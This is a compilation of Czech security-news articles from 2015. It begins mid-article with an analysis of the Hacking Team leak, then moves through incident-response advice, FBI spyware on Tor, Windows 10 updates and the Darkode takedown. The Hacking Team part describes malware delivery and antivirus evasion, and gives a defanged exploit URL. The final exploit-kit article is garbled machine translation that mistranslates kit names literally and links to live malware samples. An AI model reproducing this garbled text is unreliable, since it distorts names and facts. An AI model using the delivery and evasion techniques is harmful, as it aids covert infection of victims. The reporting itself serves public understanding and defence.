V databázi jsou docela srozumitelně pojmenované tabulky a snadno se tak najde, co je potřeba. Na projektové stránce vytěžování informací u nás v brmlabu najdete příklad skript, který umožní filtrovat podle e-mailové adresy (uvažte třeba %@%.cz).

Tak jak to tedy fungovalo?

Následující text je interpretací mailů, které si Hacking Team psal s českým zastoupením. Samozřejmě je možné, že mi něco uniklo, případně že byly maily falšovány.

V Česku probíhala komunikace se společností Bull, jejíž zaměstnanci se podepisovali jako „UZC Bull“. Bull je znám dodáváním různých podobných technologií, dá se dohledat například zakázka na dodání IMSI catcherů (zařízení pro odposlech mobilních telefonů) pro Ministerstvo vnitra (a taky si o něm psali s HT). UZC je pak Útvar zvláštních činností služby kriminální policie a vyšetřování. Kromě e-mailových adres končících na @bull.cz jsou tam i tikety od @mvcr.cz, @pcr.cz a @ppcr.cz.

Po vyjednání ceny a dalších drobností poskytne HT RCS (Remote Control System)/Da Vinci/Galileo. Jde o grafické rozhraní k řídícímu centru botnetu. V tomto GUI si můžete zakládat skupiny lidí/počítačů, přiřazovat k nim důkazy atd. Nakonec kliknete a vygeneruje se vám soubor agent.exe obsahující samotného botnet klienta. Ten musí vaše oběť spustit.

Ono je to tedy tedy trochu složitější, podle mailů je několik úrovní botnet klientů. agent.exe nejspíš pouze stáhne další soubor, kterému říkají Scout. Ten umožňuje na dálku pouze nějaké základní operace. Pak je možné ho upgradovat na Soldier a Elite, které už umí všechno, co inzerují (tahání souborů, keylogger, screenshoty, odposlech…). Je to kvůli tomu, že Elite detekují heuristickými analýzami některé antiviry.

Exploity

Zatím jsme si tedy vygenerovali škodlivý kód. Samozřejmě můžeme oběť pomocí sociálního inženýrství přesvědčit, aby ten exe soubor prostě spustila. U počítačově trochu znalých lidí to ale asi nepůjde. Proto je podstatnou částí řešení tzv. 0day feed. Ten umožňuje zneužít ještě nezveřejněné a neopravené chyby v populárním software. Tyto chyby se například kupují od ruských hackerů nebo od ČVUT. Nebo ne?

HT se zjevně bál dát 0daye přímo do toho RCS – nejspíš by je někteří lidé začali využívat příliš často (například by je nějaká vláda začala vkládat do všech webových stránek putujících přes hranici do jejich země) a každé takové použití nese riziko, že se na to přijde a pracně/draze získaná chyba bude odhalena a opravena. Proto byl postup získání exploitu následující:

Klient založí tiket a napíše do něj, jaký exploit by si představoval (např. wordovský dokument, webovou stránku atd.) a přiloží vygenerovaný agent.exe. V případě, že jde o wordovský dokument, přiloží jeho „čistou“ verzi, v případě, že jde o webovou stránku, uvede URL, na kterou má být oběť přesměrována. Příklady dokumentů, co jsem viděl, jsou třeba životopisy nebo nájemní smlouvy. Příklady webových stránek jsou i takové nečekané věci jako obchod s tújemi.
Zaměstnanec HT do dokumentu vloží exploit, případně, jedná-li se o webovou stránku, vytvoří na jednom z mnoha anonymně registrovaných VPS stránku a vloží do ní exploit. Dokument/URL pošle zpět. URL je například hxxp://46.38.63.194/docs/nx0STJ/adtbp.html a je doporučeno použít falešného HTML odkazu nebo zkracovače, aby to vypadalo důvěryhodněji (nechápu, proč si nemohli koupit doménu).
Jaké exploity se používaly? Viděl jsem exploit na Flash, exploit na Internet Explorer a exploit na Javu. Co se týče dokumentů, používal se také exploit na Flash. V .docx nebo .pptx souboru byl vložen ActiveX prvek, který stáhl flashovou animaci. .docx stažený z internetu má prý navíc příznak, že pochází z internetu a Word v něm tu ActiveX komponentu nespustí, takže se posílal zararovaný (unrar tedy nejspíš tento příznak nectí).

Z důvodu výše zmíněné opatrnosti byly standardně všechny exploity jednorázové, tj. server poskytující uvedenou animaci ji nechal stáhnout vždycky jenom jednou (kdyby člověku vyskočilo varování od antiviru a pak tu stránku zkoušel tahat znova nebo to někomu poslal na analýzu). Dále byl kontrolován user-agent, že tam člověk jde ze zranitelného prohlížeče. Díky tomu jsou dokumenty čisté, i když je nahrajete třeba na VirusTotal.

Mimochodem z tohoto principu pramení zmatení, které jsem viděl v článcích i diskuzích – člověk si přečte, že chtějí exploit na www.kb.cz a myslí si, že buď útočili na web Komerční banky nebo že se dokonce s KB domluvili, aby jim na tu stránku exploit dala. Ve skutečnosti se ale jedná pouze o cíl toho přesměrování.

Další informace k exploitům

Kromě popsané infekce počítače s Windows jsou podporovány také telefony s Androidem. Ty česká policie využívala konkrétně ke vzdálené aktivaci mikrofonu a nahrávání rozhovorů, které se děly v blízkosti. Mimochodem tato aktivace se děje pomocí SMS a v dumpu díky tomu můžete najít soukromá telefonní čísla policejních agentů. Informace o sledovaných se bohužel omezují na nekvalitně začerněné IP adresy ve screenshotech, IMEI a IMSI telefonu a SIM karty a občas nicneříkající jména agentů (např. RodinaJ_00) a mnohoznačná hostnames.

Dále je vidět, že kromě počítačů s Windows byl infikován i nějaký MacBook s česky znějícím hostname. A místní osazenstvo by mohlo zajímat, že policie získala demo licenci na linuxovou verzi malware (mimochodem podle všeho se nesnaží nějak moc skrývat a je vidět třeba v ps) – bohužel byla vydána 26. června 2015, takže si ji nejspíš nestihli moc užít.

Alternativní cestou infekce je též „Evil Maid Attack“ – pokud máte fyzický přístup k počítači, nabootujete live CD a to infikuje Windows, která jsou na počítači nainstalovaná. A ještě jedna věc, injector. Zařízení, které se nainstaluje k ISP a ten flashový exploit vloží do stránky samo, případně napadne nezabezpečenou wifinu a též ho vloží do stránky. O těchto typech útoků se ale dá jen říct, že se o ně policie zajímala, jestli došlo i k nějakému praktickému nasazení z dokumentů není zřejmé.

Slovensko

Hacking Team si psal i se SIS. Nakonec ale k obchodu nedošlo a SIS si pořídila sledovací software od konkurenční Gamma Group.

Služby

Novináři jistě vytáhnou, kolik že to stálo. Je potřeba vzít v úvahu, že podpora Hacking Teamu byla špičková: například česká policie přišla s tím, že jim to nefunguje na ruských Windows XP SP3, a HT to ihned začal řešit, Windows sehnal atd., nebo si třeba koupili lokální antivir (na firemní adresu!), aby zjistili, jestli to projde. Navíc exploity něco stojí a dělat takové GUI a udržovat tu infrastrukturu pro pár zákazníků…

e-book_prehistorie_pocitacu

Obrana

Neutěšoval bych se tím, že nemáte Flash, Javu a IE, na které byly použité exploity. Za podobnou cenu jdou sehnat i exploity na jiný software. A cena v přepočtu kolem tří milionů korun? Hacking Teamu zaplatila jenom ČR o řád víc. Navíc ten exploit poskytnou desítkám zákazníků, takže se to rozpustí.

Pravidelné aktualizace nepomohou, protože jde o ještě neodhalené chyby. Co tedy s tím? Obávám se, že na běžném linuxovém desktopu nemáte šanci (pokud by tedy linuxová verze toho malware byla lépe odladěna – což se dá s rostoucí popularitou Linuxu čekat). Pomohlo by spouštět různé věci v různých virtuálech. Tuto myšlenku implementuje třeba Qubes OS.


Zlepšete své reakce na incidenty (1)

19.7.2015 Incidenty
Reakce na incidenty (Incident Response, IR) se často propaguje jako aktivní ochrana na své vlastní vrstvě, v celkovém obrazu by ji ale bylo možné stejně tak nazývat obnovou po havárii nebo plánováním nepřetržitého provozu.

Pokud zjistíte bezpečnostní incident, je jedno, zda právě probíhá nebo už prošel vaším IT před delší dobou, musí se vykonat několik kroků, které zajistí, že se vaše organizace zotavila z následků a že se daná situace už nebude opakovat. Předtím však musí existovat plán reakce.

Reakce na incidenty je něco, co se vyvíjí a také se v průběhu času v organizaci mění. Incidenty mohou být technické a fyzické. Přestože se nemůžete připravit na všechno, je moudré se alespoň přichystat na nejpravděpodobnější hrozby, kterým bude vaše organizace čelit.

„Firmám došlo, že ať budou investovat do obranných strategií jakkoliv vysokou částku, v určitém okamžiku stejně dojde k selhání. Prokazuje se to neustále. Dokonce i nejlepší systémy selžou, protože čím déle existují, tím více útočníků bude hledat způsoby, jak je obejít,“ tvrdí Ken Silva, prezident kybernetických strategií ve společnosti ManTech Cyber ​​Solutions.

„Vynakládají veškerý svůj čas, školení, vzdělávání a finanční prostředky na faktor obrany a dokonce i vnitřní ochrany, ale nedaly ani halíř na účely reakce na incidenty.

Ta přitom bývá ve většině případů záležitostí ad hoc, která vzniká podle potřeby a je podobná hasičskému sboru tvořenému dobrovolníky. Jediným rozdílem je, že dobrovolní hasiči jsou řádně vyškolení a používají správné postupy a mají vhodné nástroje.“

Vytváření plánu IR a zajištění, aby odpovídal cílům a potřebám organizace stejně jako existujícím zásadám a dodržování předpisů, může být velmi náročné. Kromě toho bude tento proces vyžadovat, aby spolu komunikovaly všechny části společnosti, což může být samo o sobě velký úkol. Jak to charakterizoval jeden bezpečnostní pracovník na nedávné konferenci Black Hat – „je to podobné jako hlídat kočky“.

Přinejmenším se musí zapojit právní oddělení, aby se zajistilo dodržování předpisů, dále vedení společnosti (tedy všichni vyšší manažeři), aby se každý z nich mohl potřebným způsobem vyjádřit, a samozřejmě i IT oddělení, které musí zajistit udržování a pravidelnou aktualizaci plánu.

Eric Fiterman, výkonný ředitel společnosti Spotkick, která nabízí platformu SaaS pro analýzy zabezpečení, tvrdí, že reakce na incidenty bude často záviset na velikosti samotné organizace. Jeho stanovisko je, že žádné dva plány nejsou stejné.

„Některé podniky a organizace jsou dostatečně velké, aby mohly trávit čas vyšetřováním, ale existuje také mnoho IT oddělení, pro které to není hlavním zájmem. Nejdůležitějším problémem je tedy zajistit spolehlivost a obnovení systémů, co nejrychleji je to možné,“ uvedl Fiterman.

Zásadní podle něj je, aby organizace pochopily, že incidenty nastanou. „Určitě se najdou určité typy škodlivých aktivit, které budou mít dopad na to, co děláte, takže by organizace měly mít plán, jak zvládnout různé okolnosti, jež mohou nastat.“
 

Podle expertů existuje několik častých problémů, pokud jde o reakce na incidenty, a jestliže se plány nevytvoří a neotestují před jejich výskytem, pak se ony potíže projevují v nejhorší možné době, tj. při skutečném incidentu.

„IT oddělením pomáhá, že svou infrastrukturu znají. Vědí, kde je hodnota dat, a znají své vstupní a výstupní body. Je to jejich síť a vědí, jak funguje. Chybují ale v tom, že nevyužívají pracovní znalosti o své síti k pochopení toho, jak incident vzniká,“ vysvětluje Chris Pogue, ředitel služeb Trustwave SpiderLabs.

Útočníci podle něj mají své cíle a nebývá to jen zábava a hraní. Mají v úmyslu něco ukrást. Chtějí to získat a zpeněžit. Pokud by oddělení IT kombinovala své znalosti se schopnostmi reakce na incidenty, dosahovala by mnohem lepších výsledků, protože znají cíle i vstupní a výstupní body.

Jedním z často se opakujících problémů reakce na incidenty je, že organizace málokdy chápou ty, kdo na ně útočí, co tito útočníci hledají a také způsoby, jak se to snaží získat.

Je tedy důležité vědět, co je cenné pro útočníka a kde se to ve vaší síti nachází. Jak již zmiňoval Pogue, znalost všech cest a přístupových bodů ke kritickým datům je nezbytná, abyste, když se něco stane, mohli přesně označit incident a odpovídajícím způsobem se s ním vypořádat.

Zásadní však je použít tento způsob myšlení i pro jiné incidenty, než jsou zranitelnosti a malware, protože třeba jsou i plány a postupy pro případy, že například dojde ke ztrátě či krádeži notebooku, k nežádoucímu vyzrazení údajů nebo se vyskytnou zlomyslní zaměstnanci, kteří zneužijí svůj přístup.

Dále by měly existovat plány pokrývající incidenty, kdy někdo zvenčí zneužije přístup nějakého pracovníka, což je případ mnoha trvalých útoků, které se často stávají v kratších úsecích a málokdy všechny najednou.

Příště se podíváme na provoz v síti a seznámíme se s osvědčenými motodami pro reakci na incidenty.


Zlepšete své reakce na incidenty (2)

19.7.2015 Incidenty
Reakce na incidenty (Incident Response, IR) se často propaguje jako aktivní ochrana na své vlastní vrstvě, v celkovém obrazu by ji ale bylo možné stejně tak nazývat obnovou po havárii nebo plánováním nepřetržitého provozu.

Minule jsme se podívali na podstatu reakce na incidenty, dnes se podíváme na praxi spojenou s firemními sítěmi.

Další oblast zájmu se soustředí na provoz v síti. Organizace musí monitorovat příchozí i odchozí provoz. Ve většině případů se pozornost věnuje hlavně příchozímu provozu, ale pokud se útočníkovi podaří toto sledování obejít, už nikdo nesleduje, co odchází.

Monitoring odchozích přenosů může pomoci odchytit unikající data. Je to rozdíl mezi způsobem řešení incidentů již dnes nebo až za rok, když vám nějaká další strana oznámí, že už jste napadeni nějakou dobu a stále vám unikají data.

Někteří lidé zdůrazňují, že při incidentu je potřebné mít jednu kontaktní osobu, která bude koordinovat úkoly a zajišťovat, aby každý, kdo se potřebuje události účastnit, měl potřebné informace.

Pokud incident vyžaduje nutnost oznámit jej, potom musí existovat jasně definované zprávy zákazníkům a partnerům (nebo široké veřejnosti), a i tehdy by měl za společnost mluvit jen tiskový mluvčí (často interní zaměstnanec pro vztahy s veřejností nebo agentura) a nikdo jiný.

Kontaktní osoba, zpráva a delegování úkolů se budou měnit v závislosti na incidentu, takže by organizace měly mít pro takové případy několik možností.

Protokolování je proces, který mnoho bezpečnostních pracovníků považuje za nezbytný. Když si přečtete různé zprávy o narušení, často se v nich poukazuje, že důkazy o útoku byly v protokolech snadno dostupné, ale nikdo jim nevěnoval pozornost. Ještě horší je, že v některých případech organizace ani netušily, že takové logy mají k dispozici.

Nejdůležitější jsou protokoly syslog, ale významné jsou i výstupy systémů IPS a IDS stejně jako protokoly ze všech nasazených firewallů. Řeknou vám, odkud útočníci přišli, co udělali a v některých případech také jak to udělali. Sice nejsou dokonalé, ale jsou velmi použitelným nástrojem.

Kromě nich je potřebné využít také další protokoly, které jsou neméně důležité, tedy například protokoly z proxy, VPN, DNS a směrovačů. Stručně řečeno – měly by se monitorovat a kontrolovat protokoly ze všech zařízení, služeb a aplikací v síti (včetně Active Directory).

Ve stejný okamžik však mohou být logy i noční můrou, protože organizace musí během incidentu rychle oddělit užitečné informace od nedůležitého zbytku. Existuje pár nástrojů, a to jak komerčních, tak i open source, které s tímto procesem mohou pomoci, ale ne každá firma je potřebuje.

Někdy je společnost tak malá, že jí stačí ruční filtrování a kontrola. V opačném případě by mělo být protokolování a reportování předmětem interní diskuze, a jsou-li potřebné nástroje, měly by se prověřit a koupit.

Například HBGary, dceřiná firma společnosti Mantech, vydala nástroj pro reakce na incidenty, vycházející z řešení firmy Vantos, již koupila. Platforma Vantos umožňuje organizacím připojit datové toky z oblastí e-commerce, turistických středisek, zábavních center apod. a vše zpřístupnit pomocí jednoduchého zobrazení, které lze sdílet s dalšími, kdo potřebují takové informace, ale vůbec nerozumějí technické stránce reakce na incidenty.

Většina dotázaných účastníků nedávné konference Black Hat zmiňovala institut SANS, kde je k dispozici užitečný dokument, jak pomocí nástrojů open source vytvořit sadu nástrojů pro reakci na incidenty a systém SIEM.

Přestože tento dokument nemusí být pro každého, určitě stojí za přečtení. Kromě tohoto jednoho dokumentu nabízí SANS i řadu informací o reakci na incidenty, které pokrývají problémy počínaje hrozbami nultého dne, sociální média a konče indikátory kompromitací a cloudovými incidenty.

Podle expertů jsou vhodné i profesionální skupiny, např. NAISG, jež jsou užitečné pro seznámení se s tím, co v oblasti reakce na incidenty existuje za nástroje a co se naopak neosvědčilo.

Osvědčené metody pro reakci na incidenty

Seznamte se s daty, která jsou cílem: Znamená to znalost všech typů dat v síti, kde se v síti ukládají a stanovení priorit jejich hodnoty. Potom zmapujte všechny způsoby, jakými lze k těmto datům přistupovat, a to jak interně, tak i externě. Naplánujte ochranu těchto dat při ukládání i při přenosech a kontrolujte i monitorujte veškeré přístupy k nim.
Zdokumentujte plány pro různé scénáře: Ne každý incident se bude týkat napadení hackery. Organizace by měly připravit plány pro útoky zvenčí, ale také pro incidenty způsobené ztrátou nebo krádeží vybavení, nehodami a útočníky z řad personálu (včetně případů, kdy vnější osoba zneužije přístup někoho ze zaměstnanců.)
Vytvořte provozní základnu: Provozní základna je určitý druh velitelského centra. Usnadní to situaci organizace a často to neznamená více než vyhrazení jedné konferenční místnosti nebo největší kanceláře v budově. V případě nutnosti to může být nějaký méně významný prostor, ale je důležité jej stanovit.
Jmenujte jedinou kontaktní osobu: Zajistěte, aby tato kontaktní osoba byla jediným, na koho se budou všichni obracet při práci na incidentu, a postarejte se o ty, kdo budou potřebovat pravidelné aktualizace a informace. Je také dobré ověřit, zda existuje možnost rychlého využití služeb agentury pro vztahy s veřejností, pro případ, že by to bylo třeba. Pokud jsou takové služby nutné, mělo by to být od tohoto okamžiku jediným hlasem komunikujícím za firmu vůči veřejnosti, co se týče libovolného incidentu. Pověřte právní oddělení řešením otázek dodržování předpisů.
Vykonávejte aktualizaci a údržbu:Zajistěte, aby se plány reakce na incidenty aktualizovaly pravidelně a aby se tyto informace udržovaly aktuální. Pokud se do sítě přidává nové zařízení nebo se přijímají další zaměstnanci, zajistěte, aby plány odrážely všechny příslušné změny. To by se mělo dělat minimálně jednou ročně.
A konečně, bez ohledu na to, jak dobrý plán je, nikdy nepřežije svůj první skutečný test: Zajistěte, aby někdo po incidentu vytvořil zprávu a abyste se poučili ze všech omylů, problémů a selhání. Plány a zásady přizpůsobujte podle potřeby.


Jak FBI využívá spyware k chytání zločinců na síti Tor?

17.7.2015 Kriminalita

To, že policejní složky využívají spyware pro identifikaci lidí na internetu, není žádnou novinkou. Debata o přiměřenosti takových metod je ale stále aktuální.
Letos na jaře zabavila FBI web s dětským pornem, který podle informací v médiích fungoval na „síti navržené pro podporu anonymní komunikace“, tedy velmi pravděpodobně přes Tor.

Na serveru bylo registrováno 214 898 členů a FBI nechala web – na základě soudního povolení – zhruba dva týdny běžet a nasadila na něj kód, který jí umožnil sbírat data o jeho návštěvnících. Použila přitom i „techniky, které by umožnily počítači poskytnout data při každém přihlášení“.

Což v praxi znamená použití nástrojů totožných s těmi, které si kdekdo kupoval od nedávno hacknutého Hacking Teamu: tedy „štěnic“ nasazených do počítačů uživatelů tohoto webu. Ty FBI umožnily uživatele najít, protože přímým vstupem do jejich zařízení obešla „ochranu“, kterou jim poskytovala anonymizace přes Tor (předpokládejme, že to Tor byl).

Zda byl někdo na základě získaných informací obviněn, zatím jasné není, ale v soudních materiálech je citován jeden případ, kdy získané informace přivedly FBI ke konkrétnímu člověku. NDTV nicméně uvádí, že už byli obvinění minimálně dva lidé, včetně bývalého učitele z New Yorku.

NDTV píše i některé další detaily o tom, jakým způsobem uživatelé server využívali. Například výše zmíněný bývalý pedagog na něm měl strávit přes 194 hodin v období od září 2014 do března 2015. Což zahrnovalo například získání přístupu k 400 fotografiím pětileté dívky zapojené do různorodých sexuálních aktivit.

Jak uvádí Reuters, k zabavení webu policii přivedly předchozí zásahy, kdy zastavila činnost menších serverů s dětskou pornografií (v roce 2012 s 5 600 a 8 100 členy). V těchto případech (policie při nich mimochodem přímo zmiňovala síť Tor) razie vedly k obvinění 28 lidí, včetně Aarona McGratha, provozovatele webů, který v roce 2014 dostal 20 let vězení.

Další podrobnosti o tomto několik let starém případu se můžete dočíst v článku Former Acting HHS Cybersecurity Chief Guilty Of Child Porn. I tady najdete zmínky o síti Tor, která sloužila k „bezpečnému“ přístupu k webu, a o tom, že policie použila software, který po instalaci do počítače sledovaných odesílal informace umožňující jejich identifikaci.

Operace Torpedo a Aaron McGrath

Hromadné instalování spywaru do počítačů všech lidí, kteří určitou službu navštívili, ale také vyvolalo dotazy, zda FBI nepřekročila meze. V Operation Torpedo: Fed Tactics on Trial in Porn Case je více informací o šetření, zda Operace Torpedo (tak se jmenovala výše popsaná aktivita) nepřekročila pravomoci, kterou jí dávalo povolení k domovní prohlídce.

Případ Aaron McGratha je podle všeho také prvním případem, kdy FBI hromadné instalace „štěnic“ použila. Před využíváním tohoto postupu tehdy varovala i ACLU (American Civil Liberties Union). Upozorňovala, že jakkoliv je jeho nasazení v případě dětské pornografie zřejmě nejsnáze ospravedlnitelné (už jen její prohlížení je totiž zločinem, takže je těžké představit si, že na podobné servery přijde někdo s legitimním důvodem), používání v jiných případech už by tak bezproblémové být nemuselo.

Pokud by totiž policie podobné techniky používala u služeb, které nejsou tak jasně za hranou zákona, dá se očekávat, že spyware skončí i v počítačích lidí, kteří mají o jejich obsah legitimní zájem – ať už jde například o žurnalisty, výzkumníky či právníky.

Jen odhalení adresy

Na Operaci Torpedo je zajímavé i to, že ve skutečnosti začala v roce 2011 v Nizozemí. Tamní kriminalisté se rozhodli napsat robota, který prohledal Tor se zaměřením na weby s dětským pornem. Což posléze vedlo k domovní prohlídce a snaze najít umístění takovýchto webů. Něco takového je v rámci sítě Tor v podstatě běžnými způsoby nemožné, ale tady byla hlavním bodem nepochopitelná chyba správce serveru Pedoboard – nechal přihlašovací údaje správce bez hesla. Policie díky tomu dokázala zjistit reálné IP adresy, vedoucí do USA a ve finále k zadržení Aarona McGratha.

Ten provozoval ještě dva další servery s totožným obsahem, jeden doma, dva tam, kde pracoval. Po zhruba roce sledování a zkoumání FBI nakonec přišla s Operací Torpedo a třemi povoleními k domovní prohlídce (na tři servery McGratha). Součástí povolení byla i výjimka, že vyrozumění sledovaných o prohlídce může být zpožděno až o 30 dní. A právě tento bod pak vyvolal právní spory, protože FBI zatkla některé lidi identifikované pomocí malwaru až za několik měsíců.

Samotný malware použitý v tomto případě sloužil pouze k získání informací o tom, odkud uživatel přistupuje. Žádné pokročilejší funkce v něm zahrnuty nebyly. Jak ale víme z hacku Hacking Teamu, zahrnuty být mohly – ať už zachycování klávesnice, získání obsahu počítače, zachycování provozu na sítích, atd.

Soud nakonec námitky obhájců obviněných za porušení podmínek příkazů k domovní prohlídce smetl ze stolu. Otázky ale zůstávají, včetně toho, nakolik soudci povolující podobné „elektronické“ domovní prohlídky vlastně rozumějí tomu, co se bude dít.

Malware skrývající se na zabavených serverech

Z hlediska bezpečnosti a počítačů je výše uvedená technika klasickým malwarem a také ji tak identifikuje antivirový či bezpečnostní software – tedy za předpokladu, že o něčem takovém ví, nebo že je využit exploit, který je známý. Něco takového se ostatně stalo v srpnu 2013, kdy se FBI pokusila spyware opět použít, ale tentokrát se kód vložený do serverů na Tor síti prozradil.

Konkrétní Javascript se snažil využít bezpečnostní chybu v prohlížeči, který se v rámci sítě Tor používá, tedy v zásadě v upravené verzi Firefoxu. Umístěn byl do rámce (IFRAME) a právě tak ho někteří uživatelé objevili. Kvůli tomu, že Tor prohlížeč nemá automatické aktualizace, byl ale útok v řadě případů úspěšný, ačkoliv využíval bezpečnostní chybu starou několik měsíců a mezitím dávno opravenou jak ve Firefoxu, tak v aktuální verzi Toru.

Podrobnosti k tomuto útoku najdete například ve Firefox Zero-day exploited against Tor anonymity a vedl nakonec k některým změnám, které posílily bezpečnost v síti Tor. A také k otázkám, zda za tímto útokem byla skutečně jenom FBI, nebo spíše NSA.


Aktualizace Windows 10 budou automatické a většina uživatelů je nevypne

17.7.2015 Bezpečnost

Nejnovější testovací build Windows 10 přinesl velkou změnu v tom, jak chce Microsoft udržovat systém aktuální. Týká se hlavně uživatelů verze Home.
Už žádné vypínání aktualizací nebo jejich odkládání na později. Ve Windows 10 pro domácí uživatele budou s největší pravděpodobností aktualizace systému povinné a nepůjdou zrušit.

Na základě nejnovější verze systému, kterou Microsoft tento týden poskytl testerům, o tom píše například Ars Technica. O této verzi se neoficiálně mluví jako o té, která už má být připravena k vydání a kterou budou do svých zařízení předinstalovávat OEM výrobci hardwaru.

V této verzi si uživatel podle Ars Technicy u aktualizací může vybrat jen ze dvou možností: zkontrolovat, stáhnout, nainstalovat a restartovat počítač automaticky, nebo automaticky zkontrolovat, stáhnout a nainstalovat a poté restartovat manuálně. Tedy žádné odmítnutí nebo odložení aktualizací na později, nebo výběr, které aktualizace instalovat a které ne.

Změna má logiku v jedné věci: Windows domácích uživatelů tak budou automaticky udržovány v nejaktuálnější podobě, včetně všech bezpečnostních záplat.

Na druhou stranu ale může přinést problémy, pokud některá aktualizace změní systém takovým způsobem, že uživateli přestane fungovat nějaký hardware nebo používaný software. Dnes stačí dotyčnou aktualizaci odinstalovat a pak se jí uživatel může vyhýbat. To už v budoucnu nebude možné.

Změna se ovšem týká jen uživatelů verze Home. Ve variantách Pro a Enterprise budou mít klienti více možností, jak s aktualizacemi zacházet. Budou je moci například oddálit, aby mohli svá zařízení na změnu připravit.


Největší útok policie na hackery. Zadržela Rusy i Pákistánce

16.7.2015 Počítačový útok

Vyšetřovatelé zavřeli diskusní fórum Darkode, kde se údajně obchodovalo s citlivými daty a kde si hackeři vyměňovali software, kterým útočili proti vyhledávaným cílům.
New York – Americké úřady ve spolupráci se zahraničními partnery zablokovaly internetové diskusní fórum Darkode s poukazem na kriminální aktivity, které se na něm odehrávají. Oznámilo to ministerstvo spravedlnosti USA. Zároveň bylo v USA zatčeno dvanáct osob, které se na provozu serveru podílely. Další lidé byli zadrženi v Evropě.

Pittsburský prokurátor David Hickton označil Darkode za "hnízdo hackerských zločinců". Ze zhruba 800 kriminálních internetových fór na světě je podle něj Darkode největší hrozbou pro data na počítačích amerických uživatelů.

Koordinovaná mezinárodní akce, jejímž cílem bylo nebezpečnou síť rozbít, byla podle expertů největší svého druhu na světě.

Americká FBI aktivity serveru vyšetřovala ve spolupráci s evropskou policejní agenturou Europol a s partnery z Latinské Ameriky, Austrálie, Izraele a Nigérie, napsala agentura Reuters. Europol zadržel 28 lidí.

Podle vyšetřovatelů zločinci využívali Darkode k obchodu s ukradenými daty a se softwarovými nástroji, s jejichž pomocí útočili proti vyhlédnutým cílům. Servery Darkodu byly dobře zabezpečené a přístupné jen prověřeným hackerům. "Byla to unikátní křižovatka hackerů z různých zemí," řekl novinářům Brian Krebs, který se kybernetickou zločinností zabývá a do Darkodu se mu podařilo proniknout.

Podle Reuters jsou mezi zadrženým hackeři ze Švédska, Slovinska, Španělska, Ruska nebo Pákistánu. Obviněni jsou z počítačových loupeží, praní špinavých peněz a šíření škodlivého softwaru.


Po Flash, co se bude využívat sady zaměří na další?

16.7.2015 Zranitelnosti
Úvod

Adobe přijal nějakou špatnou publicitu, pokud jde o zero-day Flash Player využije kvůli nedávnému Hacking Team kompromisu [ 1 , 2 ]. To rozhodně není poprvé, Adobe má takové problémy [ 3 ]. S HTML5 video jako alternativa k Flash player, dalo by se divit, jak dlouho Flash player bude relevantní. Google oznámil další stabilní verzi prohlížeče Chrome bude blokovat auto-přehrávání Flash prvky [ 4 ], a Firefox začal blacklisting pluginy Flash player na počátku tohoto týdne [ 5 ]. Díky lidem, jako je Facebook je hlavní bezpečnostní důstojník volá Adobe oznamuje koncového-of-života termín pro Flash [ 6 ], byl jsem přemýšlel o budoucnosti Flash player.

Přesněji řečeno, byl jsem přemýšlel, co exploit kit (EK), autoři se obrátit na, jakmile Flash player již není relevantní.

V posledních měsících, většina EK traffic jsem generovaný použit blesk exploit nakazit zranitelné počítače Windows. Situace se dnes Flash player je podobně jako situace s Java, který si pamatuji zpět v roce 2013 a většina z roku 2014. Nicméně, na podzim roku 2014, většina EKS poklesla Java těží ze svého arzenálu a začal se spoléhat na Flash player jako vozidlo za jejich nejvíce up-to-date využije.

Nedávná historie Java využívá v EK provozu

Java využije byli prevelant, když jsem poprvé začal blogů o EK provozu v roce 2013 [ 7 ]. Tehdy, Blackhole EK byl ještě hráčem, a já běžně viděl Java exploity v EK provozu.

Hrozeb změnila trochu, když EK údajné tvůrce "břichem" byl zatčen. Organizace, které monitorují provoz EK zaznamenali prudké snížení Blackhole EK provozu v roce 2014 ve srovnání s předchozím rokem [ 8 ]. Během té stejné době, začal jsem si všímat víc Flash exploity v EK provozu. Do září 2014 většina ze zbývajících EKS přestali používat Java.

Moje poslední dokumentované termíny pro Javu využívá v exploit kit provoz jsou nižší (čti: zneužít jméno kit - data Java exploit naposledy viděn).

Rybář EK - 2014-09-16 [ 9 ]
Flashpack EK - 2014-08-30 [ 10 ]
Jaderná EK - 09.8.2014 [ 11 ]
Velikost EK - 2014-08-15 [ 12 ]
Sladké Orange EK - 2014-09-25 [ 13 ]
Rig EK - 09.6.2014 [ 14 ]
Za zmínku stojí, Flashpack EK a sladké Orange EK zmizely, a oni nejsou v současné době problém. Neutrino EK byl spící od dubna do října roku 2014, a když to přišlo zpátky, neviděl jsem ji používat jakékoliv zneužití Java.

Fiesta EK stále vysílá několik různých typů využije v závislosti na zranitelné klienta, a to ještě má Java využívá ve svém arzenálu. Ostatní menší-viděný EKS jako Kaixin i nadále používat Java exploity. Nicméně, většina z EKS vzdal na Java někdy v loňském roce.

Co jsme v poslední době viděli s Flash exploity

Nejvíce využívají soupravy používat nejnovější dostupné Flash exploity. Rybář, Neutrino, Jaderná, velikosti, a Rig EK jsou všechny využitím nejnovější Hacking Team Flash player exploit na základě CVE-2015-5122 [ 15 ]. Pokud máte Flash player v počítači se systémem Windows, měli byste být spuštěn nejnovější aktualizace Flash (verze 18.0.0.209, jak píšu to).

Dříve jsem generované rybář EK provoz infikovat hostitele Windows běžící Flash player 18.0.0.203 na IE 11. Rybář poslal Flash exploit na základě CVE-2015 - 5122, a EK poslal CryptoWall 3.0 jako malware užitečného zatížení.

Nahoře: Obraz infekce rybář EK a po infekci CryptoWall 3,0 provoz v Wireshark. Klikněte na obrázek pro zobrazení v plné velikosti.

Nahoře: Rybář EK zaslání Flash využívat, na základě CVE-2015-5122, cílení Flash 18.0.0.203.

Adresa Bitcoin infikované hostitele pro výplatu výkupného byl 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU . Adresa je stejný vidět na 07.1.2015 a také dokumentováno v mém předchozím deníku na CryptoWall 3.0 [ 16 ].

Nahoře: dešifrovat pokyny z infikovaného počítače.

Závěrečná slova

V současné době je většina EKS využít Flash player využije na základě naposledy známých zranitelností. Ale tato situace nemůže trvat věčně. Pokud Flash již není relevantní, co se kategorie EK autoři obrátit s žádostí o jejich nejnovější využije? Budou se vrátit k Javě? Budou se zaměřují na zranitelnosti prohlížeče? Bude zajímavé sledovat, kde se věci mají v příštím roce nebo tak nějak.

Pcap z 2015-07-15 rybář EK infekce provoz je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/07/15/2015-07-15-Angler-EK-traffic-for-ISC-diary.pcap
Zip soubor přidružené malware je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/07/15/2015-07-15-Angler-EK-and-CryptoWall-3.0-malware-for-ISC-diary.zip
